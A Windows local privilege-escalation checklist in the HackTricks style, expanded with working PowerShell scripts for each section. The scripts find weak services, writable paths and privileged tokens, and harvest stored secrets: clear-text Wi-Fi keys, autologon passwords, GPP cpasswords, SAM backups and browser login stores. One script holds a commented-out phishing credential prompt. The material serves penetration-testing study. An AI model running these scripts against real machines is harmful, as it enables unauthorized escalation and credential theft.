Checklist - Local Windows Privilege Escalation
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Best tool to look for Windows local privilege escalation vectors: WinPEAS
System Info
- Obtain System information (OS version, build, architecture, installed hotfixes)
- Search for kernel exploits using scripts
- Use Google to search for kernel exploits
- Use searchsploit to search for kernel exploits
- Interesting info in env vars?
- Passwords in PowerShell history?
- Interesting info in Internet settings (proxy, PAC file)?
- Drives (local volumes and mapped shares)?
- WSUS exploit (updates fetched over plain HTTP)?
- Third-party agent auto-updaters / IPC abuse
- AlwaysInstallElevated?
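The System Info checks above as one read-only PowerShell pass. This is an added example, not code from the HackTricks page; every path and registry key is the Windows default location, and the regexes used to grep history and environment variables are just a starting point.

```powershell
# Added example (not the HackTricks page's own code): System Info triage in one pass.
# Everything here is read-only enumeration of the local host.

# OS version and build plus the most recent hotfixes: feed these to searchsploit / Google for kernel exploits
$os = Get-CimInstance Win32_OperatingSystem
'{0} build {1} ({2})' -f $os.Caption, $os.BuildNumber, $os.OSArchitecture
Get-HotFix | Sort-Object InstalledOn | Select-Object HotFixID, InstalledOn -Last 10

# Environment variables whose name or value smells like a secret or points at something interesting
Get-ChildItem Env: | Where-Object { $_.Name -match 'pass|pwd|token|key|secret' -or $_.Value -match 'pass|pwd|token|key|secret' }

# PSReadLine history of every profile we can read (passwords typed into net use, Invoke-WebRequest, etc.)
Get-ChildItem "$env:SystemDrive\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -ErrorAction SilentlyContinue |
    ForEach-Object { "== $($_.FullName)"; Select-String -Path $_.FullName -Pattern 'pass|cred|secure|net use|-p ' }

# Internet settings: a configured proxy or PAC file may be the only route out of the host
Get-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -ErrorAction SilentlyContinue |
    Select-Object ProxyEnable, ProxyServer, AutoConfigURL

# Drives, including mapped network shares (DisplayRoot is the UNC path)
Get-PSDrive -PSProvider FileSystem | Select-Object Name, Root, DisplayRoot

# WSUS: updates fetched over plain HTTP from an internal server are the precondition for the WSUS MITM attack
$wu = Get-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate' -ErrorAction SilentlyContinue
$au = Get-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU' -ErrorAction SilentlyContinue
if ($wu.WUServer -and $au.UseWUServer -eq 1) {
    "WSUS server: $($wu.WUServer)" + $(if ($wu.WUServer -like 'http://*') { '  <- plaintext HTTP, MITM-able' })
}

# Third-party agents running as SYSTEM from outside the Windows directory: candidates for auto-updater / IPC abuse
Get-CimInstance Win32_Service |
    Where-Object { $_.StartName -eq 'LocalSystem' -and $_.PathName -and $_.PathName -notmatch '\\Windows\\' } |
    Select-Object Name, PathName

# AlwaysInstallElevated: any .msi installs as SYSTEM only if BOTH the HKLM and HKCU values are 1
$msi  = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
$hklm = (Get-ItemProperty "HKLM:\$msi" -ErrorAction SilentlyContinue).AlwaysInstallElevated
$hkcu = (Get-ItemProperty "HKCU:\$msi" -ErrorAction SilentlyContinue).AlwaysInstallElevated
if ($hklm -eq 1 -and $hkcu -eq 1) { 'AlwaysInstallElevated: ENABLED in HKLM and HKCU' }
else { "AlwaysInstallElevated: not exploitable (HKLM=$hklm HKCU=$hkcu)" }
```

The AlwaysInstallElevated check is the one people most often get wrong: a single key set to 1 is not enough, both values must be present and equal to 1.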
Logging/AV enumeration
- Check Audit and WEF settings
- Check LAPS
- Check if WDigest is active
- LSA Protection?
- Credential Guard?
- Cached Credentials?
- Check if there is any AV
- AppLocker Policy?
- UAC
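An added example (not the page's own code) that reads the state of each defensive control listed above from the registry and WMI, so you know what will and will not work before touching LSASS or dropping tools. The `Get-RegValue` helper is defined here for convenience; all registry paths are the documented defaults.

```powershell
# Added example (not the page's own code): state of the logging / credential-protection / AV controls.
function Get-RegValue([string]$Path, [string]$Name) {
    (Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue).$Name
}

# Audit policy (full output needs admin) and WEF: a SubscriptionManager value means logs leave the box
auditpol /get /category:* 2>$null | Select-String 'Success|Failure' | Select-Object -First 15
$wef = Get-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager' -ErrorAction SilentlyContinue
"WEF subscription manager: $(if ($wef) { ($wef.PSObject.Properties | Where-Object Name -match '^\d+$').Value -join ', ' } else { 'none' })"

# LAPS (legacy CSE): local admin password is rotated and stored in AD, so reuse across hosts is unlikely
"LAPS AdmPwdEnabled: $(Get-RegValue 'HKLM:\SOFTWARE\Policies\Microsoft Services\AdmPwd' 'AdmPwdEnabled')"

# WDigest: UseLogonCredential=1 keeps plaintext passwords in LSASS memory
"WDigest UseLogonCredential: $(Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' 'UseLogonCredential')"

# LSA Protection: RunAsPPL=1 means only PPL-signed code can open LSASS
"LSA RunAsPPL: $(Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' 'RunAsPPL')"

# Credential Guard: LsaCfgFlags 1 (with UEFI lock) or 2 (without lock) = configured;
# SecurityServicesRunning containing 1 = actually running
"Credential Guard LsaCfgFlags: $(Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' 'LsaCfgFlags')"
Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue |
    Select-Object SecurityServicesRunning

# Cached domain logons (default 10): DCC2 hashes in the SECURITY hive, crackable but not pass-the-hash-able
"CachedLogonsCount: $(Get-RegValue 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' 'CachedLogonsCount')"

# AV products registered with Security Center, plus live Defender status
Get-CimInstance -Namespace root\SecurityCenter2 -ClassName AntiVirusProduct -ErrorAction SilentlyContinue |
    Select-Object displayName, productState
Get-MpComputerStatus -ErrorAction SilentlyContinue |
    Select-Object AntivirusEnabled, RealTimeProtectionEnabled, IsTamperProtected

# AppLocker: effective policy per rule collection (Exe, Dll, Script, Msi, Appx) and its enforcement mode
$alXml = Get-AppLockerPolicy -Effective -Xml -ErrorAction SilentlyContinue
if ($alXml) { ([xml]$alXml).AppLockerPolicy.RuleCollection | Select-Object Type, EnforcementMode }
else { 'AppLocker: no effective policy' }

# UAC: EnableLUA=0 disables it; ConsentPromptBehaviorAdmin=0 elevates admins silently;
# LocalAccountTokenFilterPolicy=1 gives local admins a full token over the network
$uac = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
'EnableLUA={0} ConsentPromptBehaviorAdmin={1} LocalAccountTokenFilterPolicy={2}' -f `
    (Get-RegValue $uac 'EnableLUA'), (Get-RegValue $uac 'ConsentPromptBehaviorAdmin'), (Get-RegValue $uac 'LocalAccountTokenFilterPolicy')
```

A missing value prints as empty, which for most of these keys means "default": WDigest plaintext caching is off by default on Windows 8.1 / Server 2012 R2 and later, RunAsPPL is off unless explicitly set, and UAC is on.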
User Privileges
- Check current user privileges
- Are you a member of any privileged group?
- Check if you have any of these tokens enabled: SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege?
- Users sessions?
- Check users' home directories (access?)
- Check Password Policy
- What is inside the Clipboard?
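The User Privileges checks in one pass, as an added example that is not part of the page. It parses the CSV output of `whoami` rather than screen-scraping the table, and the list of group names it greps for is an assumption about which groups matter most on a typical host.

```powershell
# Added example (not the page's own code): current user, privileges, groups, sessions, homes, policy, clipboard.
whoami /all   # user, groups, privileges and integrity level in one shot

# Token privileges from the checklist. Presence is what matters: a privilege in the
# "Disabled" state can still be enabled by the process itself with AdjustTokenPrivileges.
$interesting = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege', 'SeTcbPrivilege', 'SeBackupPrivilege',
               'SeRestorePrivilege', 'SeCreateTokenPrivilege', 'SeLoadDriverPrivilege', 'SeTakeOwnershipPrivilege', 'SeDebugPrivilege'
whoami /priv /fo csv | ConvertFrom-Csv |
    Where-Object { $interesting -contains $_.'Privilege Name' } |
    Select-Object 'Privilege Name', State

# Privileged group memberships (group list is an assumption; extend for the environment)
$groups = whoami /groups /fo csv | ConvertFrom-Csv | Select-Object -ExpandProperty 'Group Name'
$groups | Where-Object { $_ -match 'Administrators|Backup Operators|Server Operators|Print Operators|Remote Desktop Users|Remote Management Users|Hyper-V Administrators|DnsAdmins' }

# Local admins and other logged-on sessions (targets for token theft / RDP hijacking)
net localgroup Administrators
query user 2>$null

# Which user home directories can we list?
Get-ChildItem "$env:SystemDrive\Users" -Directory -Force | ForEach-Object {
    try { Get-ChildItem -LiteralPath $_.FullName -Force -ErrorAction Stop | Out-Null; "$($_.Name): readable" }
    catch { "$($_.Name): access denied" }
}

# Local password policy: the lockout threshold decides whether spraying is safe at all
net accounts

# Clipboard: whatever the user copied last, not rarely a password
Get-Clipboard -ErrorAction SilentlyContinue
```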
Network
- Check current network information
- Check for hidden local services that are not reachable from the outside
Running Processes
- Check permissions of the processes' binaries: file and folder permissions
- Memory password mining
- Insecure GUI apps
- Steal credentials from interesting processes (firefox, chrome, etc.) with ProcDump.exe?
Services
- Can you modify any service?
- Can you modify the binary that is executed by any service?
- Can you modify the registry of any service?
- Can you take advantage of any unquoted service binary path?
- Service Triggers: enumerate and trigger privileged services
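One added example (not the page's own code) that serves both the Running Processes and the Services sections: an ACL-based "can my token write this?" test, applied to running process binaries and their folders, service binaries, every directory an unquoted service path could be hijacked from, and the service's own registry key. The `Test-WritableByMe` helper and the rights masks are this example's own; the service object DACL and service triggers are not file ACLs, so they are pointed at with the stock `sc.exe` / `accesschk.exe` commands in the comments.

```powershell
# Added example (not the page's own code): writable process binaries and service misconfigurations.
$me = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids  = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })
$fsMask  = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, TakeOwnership, ChangePermissions'
$regMask = [System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, WriteKey, FullControl, TakeOwnership, ChangePermissions'

function Test-WritableByMe([string]$Path) {
    # True if any Allow ACE for one of our SIDs grants a right that lets us replace/repoint the target
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    $isReg = $Path -like 'HK*:*'
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { continue }
        if ($mySids -notcontains $sid) { continue }
        $hit = if ($isReg) { $ace.RegistryRights -band $regMask } else { $ace.FileSystemRights -band $fsMask }
        if ($hit) { return $true }
    }
    return $false
}

# --- Running processes: can we overwrite the binary (or drop into its folder) of something privileged?
Get-Process | Where-Object Path | Sort-Object Path -Unique | ForEach-Object {
    if (Test-WritableByMe $_.Path) { "PROC writable binary: $($_.Path) (pid $($_.Id))" }
    elseif (Test-WritableByMe (Split-Path $_.Path)) { "PROC writable folder : $(Split-Path $_.Path) -> $($_.Name)" }
}
# Memory of an interesting process (browser, password manager) can be dumped with Sysinternals:
#   procdump.exe -accepteula -ma <pid> out.dmp   (then string-search / parse the dump offline)

# --- Services
foreach ($svc in (Get-CimInstance Win32_Service | Where-Object PathName)) {
    $cmd = $svc.PathName
    if ($cmd -match '^"([^"]+)"')      { $exe = $Matches[1] }     # quoted: the text inside the quotes
    elseif ($cmd -match '^(.+?\.exe)') { $exe = $Matches[1] }     # unquoted: up to the first .exe
    else                               { $exe = ($cmd -split ' ')[0] }

    # Unquoted path with spaces: the SCM tries "C:\Program.exe", "C:\Program Files\Some.exe", ... in order
    if ($cmd -notmatch '^"' -and $exe -match ' ') {
        $parts = $exe -split ' '
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = $parts[0..($i - 1)] -join ' '
            $dir = Split-Path $candidate
            if ($dir -and (Test-Path $dir) -and (Test-WritableByMe $dir)) {
                "SVC unquoted path : $($svc.Name) -> planting '$candidate.exe' in writable $dir wins"
            }
        }
    }
    if ((Test-Path $exe) -and (Test-WritableByMe $exe)) {
        "SVC writable binary: $($svc.Name) -> $exe (runs as $($svc.StartName), start=$($svc.StartMode))"
    }
    # Service registry key: write access lets us repoint ImagePath
    $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
    if (Test-WritableByMe $key) { "SVC writable regkey: $key" }
}
# The service object DACL (can we reconfigure / start / stop it?) is separate from all of the above:
#   sc.exe sdshow <name>        or      accesschk.exe -uwcqv "Authenticated Users" *
# Triggers that start a stopped privileged service on demand (ETW event, named pipe, RPC endpoint):
#   sc.exe qtriggerinfo <name>
```

Two caveats a practitioner will hit: `Get-Acl` is denied on many service keys and on binaries under `C:\Windows`, which the helper treats as "not writable" (correct for exploitation purposes), and a writable binary of a service you cannot start or stop is only useful if the service restarts on its own (check `StartMode` and whether a reboot is acceptable).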
Applications
- Write permissions on installed applications
- Startup Applications
- Vulnerable Drivers
DLL Hijacking
- Can you write in any folder inside PATH?
- Is there any known service binary that tries to load a non-existent DLL?
- Can you write in any binaries folder?
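An added example (not the page's own code) covering the Applications and DLL Hijacking sections together. Instead of parsing ACLs it uses an empirical probe, creating and deleting a random file, which is the most reliable answer to "can I write here?" but does touch disk and may be noticed by EDR. Paths are the Windows defaults; the driver listing is meant to be compared against a vulnerable-driver list such as loldrivers.io.

```powershell
# Added example (not the page's own code): writable PATH entries and app folders, startup locations, drivers.
function Test-CanWrite([string]$Dir) {
    # Empirical check: try to create and delete a random file (touches disk; noisy but reliable)
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $probe = Join-Path $Dir ([IO.Path]::GetRandomFileName())
    try { [IO.File]::WriteAllText($probe, ''); Remove-Item -LiteralPath $probe -Force; $true } catch { $false }
}

# PATH: a writable directory here lets us shadow any DLL/EXE a privileged process loads by bare name
($env:Path -split ';' | Where-Object { $_ }) | ForEach-Object { if (Test-CanWrite $_) { "WRITABLE PATH dir: $_" } }

# Installed applications: writable top-level folders under Program Files (binary replacement / DLL planting)
foreach ($root in @($env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }) {
    Get-ChildItem $root -Directory -ErrorAction SilentlyContinue | Where-Object { Test-CanWrite $_.FullName } |
        ForEach-Object { "WRITABLE app folder: $($_.FullName)" }
}
# Which binaries load a DLL that does not exist? Run Procmon and filter on
#   Result is "NAME NOT FOUND"  and  Path ends with ".dll", then look for paths you can write to.

# Startup applications: folders and Run/RunOnce keys run in the context of whoever logs on
$startupDirs = @("$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp",
                 "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup")
foreach ($d in $startupDirs) {
    Get-ChildItem $d -ErrorAction SilentlyContinue | Select-Object FullName
    if (Test-CanWrite $d) { "WRITABLE startup dir: $d" }
}
foreach ($hive in 'HKLM', 'HKCU') {
    foreach ($k in 'Run', 'RunOnce') {
        Get-ItemProperty "${hive}:\SOFTWARE\Microsoft\Windows\CurrentVersion\$k" -ErrorAction SilentlyContinue |
            Select-Object * -ExcludeProperty PS* | Format-List
    }
}

# Drivers: name, on-disk path and file version, for comparison against known-vulnerable driver lists
Get-CimInstance Win32_SystemDriver | Where-Object { $_.State -eq 'Running' -and $_.PathName } | ForEach-Object {
    $p = $_.PathName -replace '^\\\?\?\\', ''     # strip the \??\ NT prefix some entries carry
    [pscustomobject]@{
        Name    = $_.Name
        Path    = $p
        Version = (Get-Item $p -ErrorAction SilentlyContinue).VersionInfo.FileVersion
    }
} | Sort-Object Name | Format-Table -AutoSize
```

A writable PATH directory only pays off if something privileged actually resolves a name through PATH (the Procmon filter above finds it); a writable startup folder pays off only when a more privileged user logs on interactively.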
Network
- Enumerate the network (shares, interfaces, routes, neighbours, ...)
- Take a special look at network services listening on localhost (127.0.0.1)
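An added example (not the page's own code) for both Network sections above: interfaces, routes, neighbours, shares and firewall profiles, then every listening TCP/UDP endpoint joined to its owning process, with localhost-only listeners flagged. It relies on the NetTCPIP and NetSecurity modules that ship with Windows 8 / Server 2012 and later.

```powershell
# Added example (not the page's own code): network triage with emphasis on localhost-only listeners.
Get-NetIPAddress -AddressState Preferred | Select-Object InterfaceAlias, IPAddress, PrefixLength
Get-NetRoute -AddressFamily IPv4 | Where-Object { $_.NextHop -ne '0.0.0.0' } | Select-Object DestinationPrefix, NextHop, InterfaceAlias
Get-NetNeighbor -AddressFamily IPv4 | Where-Object { $_.State -ne 'Unreachable' } | Select-Object IPAddress, LinkLayerAddress, State
Get-NetFirewallProfile | Select-Object Name, Enabled, DefaultInboundAction
net share
net use

# Listening endpoints with process names. A 127.0.0.1 / ::1 listener is invisible from the network
# but reachable from our shell (or through a port forward), so it deserves the extra attention.
$names = @{}
Get-Process | ForEach-Object { $names[[int]$_.Id] = $_.Name }
$tcp = Get-NetTCPConnection -State Listen | ForEach-Object {
    [pscustomobject]@{
        Proto     = 'TCP'
        Address   = $_.LocalAddress
        Port      = $_.LocalPort
        ProcessId = $_.OwningProcess
        Process   = $names[[int]$_.OwningProcess]
        LocalOnly = $_.LocalAddress -in @('127.0.0.1', '::1')
    }
}
$udp = Get-NetUDPEndpoint | ForEach-Object {
    [pscustomobject]@{
        Proto     = 'UDP'
        Address   = $_.LocalAddress
        Port      = $_.LocalPort
        ProcessId = $_.OwningProcess
        Process   = $names[[int]$_.OwningProcess]
        LocalOnly = $_.LocalAddress -in @('127.0.0.1', '::1')
    }
}
@($tcp) + @($udp) | Sort-Object LocalOnly, Port -Descending | Format-Table -AutoSize
```

Read the output against the firewall profile: a listener bound to 0.0.0.0 with inbound default Block is, for a remote attacker, no different from a localhost-only one, but from the local shell both are fair game.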
Windows Credentials
- Winlogon credentials
- Windows Vault credentials that you could use?
- Interesting DPAPI credentials?
- Passwords of saved Wifi networks?
- Interesting info in saved RDP Connections?
- Passwords in recently run commands?
- Remote Desktop Credentials Manager passwords?
- AppCmd.exe exists? Credentials?
- SCClient.exe? DLL Side Loading?
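Where Windows keeps each credential source listed above, as an added example that is not part of the page. It locates and lists them; decrypting DPAPI-protected blobs (Credential Manager, RDCMan files) is a separate, usually offline, step. The `.rdg` search location is an assumption (RDCMan saves wherever the user chose), and the SCCM path is the default client install directory.

```powershell
# Added example (not the page's own code): saved / ambient credential sources on the host.

# Winlogon autologon: DefaultPassword is stored in clear text when AutoAdminLogon is configured
Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' |
    Select-Object AutoAdminLogon, DefaultDomainName, DefaultUserName, DefaultPassword, AltDefaultUserName, AltDefaultPassword

# Windows Vault / Credential Manager: targets and usernames (the secrets need DPAPI decryption or mimikatz)
cmdkey /list
vaultcmd /listcreds:"Windows Credentials" /all 2>$null
vaultcmd /listcreds:"Web Credentials" /all 2>$null

# DPAPI artefacts for the current user: master keys (Protect\<SID>\<GUID>) and credential blobs
Get-ChildItem "$env:APPDATA\Microsoft\Protect", "$env:APPDATA\Microsoft\Credentials", "$env:LOCALAPPDATA\Microsoft\Credentials" `
    -Force -Recurse -ErrorAction SilentlyContinue | Select-Object FullName, Length

# Saved Wi-Fi profiles with their PSK in clear text
netsh wlan show profiles | Select-String '(?:All User|Current User) Profile\s*:\s*(.+)$' | ForEach-Object {
    $name = $_.Matches[0].Groups[1].Value.Trim()
    $m = netsh wlan show profile name="$name" key=clear | Select-String 'Key Content\s*:\s*(.+)$'
    "$name : $(if ($m) { $m.Matches[0].Groups[1].Value.Trim() } else { '<no PSK stored / open network>' })"
}

# Saved RDP targets and the usernames used for them
Get-ChildItem 'HKCU:\Software\Microsoft\Terminal Server Client\Servers' -ErrorAction SilentlyContinue |
    ForEach-Object { "$($_.PSChildName) as $((Get-ItemProperty $_.PSPath).UsernameHint)" }
Get-ItemProperty 'HKCU:\Software\Microsoft\Terminal Server Client\Default' -ErrorAction SilentlyContinue | Select-Object MRU*

# Recently run commands (Run dialog MRU) sometimes carry a password on the command line
Get-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -ErrorAction SilentlyContinue |
    Select-Object * -ExcludeProperty PS*

# Remote Desktop Connection Manager: .rdg files hold DPAPI-encrypted passwords (search location assumed)
Get-ChildItem $env:USERPROFILE -Recurse -Filter *.rdg -ErrorAction SilentlyContinue | Select-Object FullName

# IIS AppCmd: application pool identities and virtual directory credentials
$appcmd = "$env:SystemRoot\System32\inetsrv\appcmd.exe"
if (Test-Path $appcmd) {
    & $appcmd list apppool /text:* 2>$null | Select-String 'userName|password'
    & $appcmd list vdir /text:* 2>$null | Select-String 'userName|password'
}

# SCCM client present? The checklist flags SCClient.exe for DLL side loading, so show its folder ACL
$scc = "$env:SystemRoot\CCM\SCClient.exe"
if (Test-Path $scc) { "SCCM client: $scc"; icacls (Split-Path $scc) }
```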
Files and Registry (Credentials)
- Putty: creds and SSH host keys
- SSH keys in registry?
- Passwords in unattended files?
- Any SAM & SYSTEM backups?
- Cloud credentials?
- McAfee SiteList.xml file?
- Cached GPP Password?
- Password in IIS Web config file?
- Interesting info in web logs?
- Do you want to ask for credentials from the user?
- Interesting files inside the Recycle Bin?
- Other registry keys containing credentials?
- Inside Browser data (dbs, history, bookmarks, ...)?
- Generic password search in files and registry
- Tools to automatically search for passwords
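The file and registry hunting list above as one sweep, added here as an example that is not the page's own code. Every path is a well-known default location (sysprep and unattend files, RegBack, inetpub, cloud CLI config directories, browser profile stores); adjust for non-standard installs. The final generic sweeps are intentionally capped because a full-disk recurse on a busy server takes minutes.

```powershell
# Added example (not the page's own code): file / registry credential hunting.

# PuTTY: saved sessions (proxy credentials are stored in clear text) and cached SSH host keys
Get-ChildItem 'HKCU:\Software\SimonTatham\PuTTY\Sessions' -ErrorAction SilentlyContinue | ForEach-Object {
    $s = Get-ItemProperty $_.PSPath
    "$($_.PSChildName): $($s.HostName) user=$($s.UserName) proxyuser=$($s.ProxyUsername) proxypass=$($s.ProxyPassword)"
}
Get-ItemProperty 'HKCU:\Software\SimonTatham\PuTTY\SshHostKeys' -ErrorAction SilentlyContinue | Select-Object * -ExcludeProperty PS*
# Windows OpenSSH ssh-agent keeps added private keys (DPAPI-protected) under this key
Get-ChildItem 'HKCU:\Software\OpenSSH\Agent\Keys' -ErrorAction SilentlyContinue

# Unattended / sysprep answer files: look for <Password> and base64 <Value> elements
$answerFiles = 'C:\unattend.xml', 'C:\Windows\Panther\Unattend.xml', 'C:\Windows\Panther\Unattend\Unattend.xml',
               'C:\Windows\System32\sysprep\sysprep.xml', 'C:\Windows\System32\sysprep\Unattend.xml',
               'C:\Windows\System32\Sysprep\Panther\Unattend.xml'
$answerFiles | Where-Object { Test-Path $_ } | ForEach-Object { Select-String -Path $_ -Pattern '<Password>|<Value>|PlainText' }

# Copies of SAM and SYSTEM (offline hash extraction)
'C:\Windows\repair\SAM', 'C:\Windows\repair\SYSTEM',
'C:\Windows\System32\config\RegBack\SAM', 'C:\Windows\System32\config\RegBack\SYSTEM' |
    Where-Object { Test-Path $_ } | Get-Item | Select-Object FullName, Length, LastWriteTime

# Cloud CLI credentials
Get-ChildItem "$env:USERPROFILE\.aws\credentials", "$env:USERPROFILE\.azure\*.json", "$env:APPDATA\gcloud\*.json", "$env:USERPROFILE\.kube\config" `
    -ErrorAction SilentlyContinue | Select-Object FullName

# McAfee SiteList.xml (obfuscated passwords, decryptable offline)
Get-ChildItem $env:ProgramData, "$env:SystemDrive\Users" -Recurse -Filter SiteList.xml -Force -ErrorAction SilentlyContinue | Select-Object FullName

# Cached Group Policy Preferences: cpassword is AES-encrypted with a key Microsoft published (MS14-025)
Get-ChildItem "$env:ProgramData\Microsoft\Group Policy\History" -Recurse `
    -Include Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml, Printers.xml -ErrorAction SilentlyContinue |
    Select-String -Pattern 'cpassword' | Select-Object Path, Line

# IIS: connection strings and credentials in web.config, and secrets that leaked into query strings in the logs
Get-ChildItem "$env:SystemDrive\inetpub" -Recurse -Filter web.config -ErrorAction SilentlyContinue |
    Select-String -Pattern 'connectionString|password' | Select-Object Path, LineNumber, Line
Get-ChildItem "$env:SystemDrive\inetpub\logs\LogFiles" -Recurse -Filter *.log -ErrorAction SilentlyContinue |
    Select-String -Pattern 'pass(word|wd)?=|token=' | Select-Object Path, Line -First 20

# Ask the user: a credential prompt that looks like a re-authentication dialog (social engineering, not a bug)
# $cred = Get-Credential -Message 'Your session has expired, please sign in again'
# $cred.GetNetworkCredential().Password

# Recycle Bin contents of every user (subfolder names are the owning SIDs)
Get-ChildItem "$env:SystemDrive\`$Recycle.Bin" -Force -Recurse -ErrorAction SilentlyContinue |
    Where-Object { -not $_.PSIsContainer } | Select-Object FullName, Length

# Browser credential stores (copy out and decrypt offline with the user's DPAPI key)
Get-ChildItem "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data",
              "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data",
              "$env:APPDATA\Mozilla\Firefox\Profiles\*\logins.json" -ErrorAction SilentlyContinue | Select-Object FullName

# Generic sweeps: suggestive file names, then any registry string value containing "password"
Get-ChildItem "$env:SystemDrive\" -Recurse -Include *pass*, *cred*, *.kdbx, *.rdp, *.config, *.ini -ErrorAction SilentlyContinue |
    Select-Object FullName -First 50
reg query HKLM /f password /t REG_SZ /s 2>$null
reg query HKCU /f password /t REG_SZ /s 2>$null
```

The `Get-Credential` prompt is left commented out on purpose: it is the "ask the user" item from the list, and it only makes sense when an interactive user is at the console and the pretext fits.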
Leaked Handlers
- Do you have access to any handle of a process run by an administrator?
Pipe Client Impersonation
- Check if you can abuse it